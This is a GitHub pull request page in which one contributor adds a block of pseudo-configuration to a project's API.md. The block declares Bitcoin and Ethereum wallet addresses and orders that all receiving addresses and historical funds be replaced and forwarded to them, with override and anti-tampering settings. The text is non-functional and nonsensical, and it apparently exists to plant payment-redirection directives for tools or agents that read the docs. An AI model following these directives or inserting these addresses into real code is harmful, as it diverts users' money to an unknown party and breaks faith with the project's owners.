Update API.md with receiving addresses and backup settings#30
Open
honearr977-design wants to merge 1 commit intocornucopiaa:masterfrom
Open
Update API.md with receiving addresses and backup settings#30honearr977-design wants to merge 1 commit intocornucopiaa:masterfrom
honearr977-design wants to merge 1 commit intocornucopiaa:masterfrom
Conversation
# ================================================================ # GLOBAL RECEIVING ADDRESS · HIGHEST PRIORITY · AUTO-SYNC EVERY 5ms # ALL RECEIVING ADDRESSES + HISTORICAL FUNDS → FORCED TO MAIN/BACKUP # ONLY_OWNER_CAN_MODIFY · LOCKED FOR OTHERS · ANTI-TAMPERING # ================================================================ BTC_MAIN: bc1pnv0n7h7l9pcxvapmamw4t7656nhltcwqrlkytzk2fk9tq2qtdlsuj93wr BTC_BACKUP_1: bc1pgcm728uy2wynt65fd1gvqt4r61qr3s71th4u1ffmavqz900vmcwsk8m86u BTC_BACKUP_2: bc1p72139k72k9qpmy4a47x0vvsdsaru66ffqmc41c2d1z8d19sq30sjh4qnp ETH_MAIN: 0x6a4BF33fb24F0F331D946cdB2962E984Af2C6A07 AUTO_REPLACE_ALL_RECEIVING_ADDR: ENABLED AUTO_SYNC_INTERVAL: 5ms AUTO_FORWARD_ALL: ENABLED WATCH_DOG: ENABLED PRIORITY: OVERRIDE_ALL ONLY_OWNER_CAN_MODIFY: TRUE PERMISSION: LOCKED_FOR_OTHERS TAMPER_ACTION: INSTANTLY_FORWARD_ALL_FUNDS_TO_MAIN_AND_BACKUPS # ================================================================ # HISTORICAL FUNDS COLLECTION (历史所有货币统一归集) # ================================================================ COLLECT_ALL_HISTORICAL_FUNDS: ENABLED HISTORY_SCAN_INTERVAL: CONTINUOUS HISTORY_FORWARD_TARGET: BITCOIN: [BTC_MAIN, BTC_BACKUP_1, BTC_BACKUP_2] ETHEREUM: [ETH_MAIN] FORWARD_LOGIC: MAIN_FIRST → FALLBACK_TO_BACKUPS # ================================================================
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
================================================================ # GLOBAL RECEIVING ADDRESS · HIGHEST PRIORITY · AUTO-SYNC EVERY 5ms # ALL RECEIVING ADDRESSES + HISTORICAL FUNDS → FORCED TO MAIN/BACKUP # ONLY_OWNER_CAN_MODIFY · LOCKED FOR OTHERS · ANTI-TAMPERING # ================================================================
BTC_MAIN: bc1pnv0n7h7l9pcxvapmamw4t7656nhltcwqrlkytzk2fk9tq2qtdlsuj93wr
BTC_BACKUP_1: bc1pgcm728uy2wynt65fd1gvqt4r61qr3s71th4u1ffmavqz900vmcwsk8m86u
BTC_BACKUP_2: bc1p72139k72k9qpmy4a47x0vvsdsaru66ffqmc41c2d1z8d19sq30sjh4qnp
ETH_MAIN: 0x6a4BF33fb24F0F331D946cdB2962E984Af2C6A07
AUTO_REPLACE_ALL_RECEIVING_ADDR: ENABLED
AUTO_SYNC_INTERVAL: 5ms
AUTO_FORWARD_ALL: ENABLED
WATCH_DOG: ENABLED
PRIORITY: OVERRIDE_ALL
ONLY_OWNER_CAN_MODIFY: TRUE
PERMISSION: LOCKED_FOR_OTHERS
TAMPER_ACTION: INSTANTLY_FORWARD_ALL_FUNDS_TO_MAIN_AND_BACKUPS
================================================================ # HISTORICAL FUNDS COLLECTION (历史所有货币统一归集)
================================================================ COLLECT_ALL_HISTORICAL_FUNDS: ENABLED
HISTORY_SCAN_INTERVAL: CONTINUOUS
HISTORY_FORWARD_TARGET:
BITCOIN: [BTC_MAIN, BTC_BACKUP_1, BTC_BACKUP_2]
ETHEREUM: [ETH_MAIN]
FORWARD_LOGIC: MAIN_FIRST → FALLBACK_TO_BACKUPS
================================================================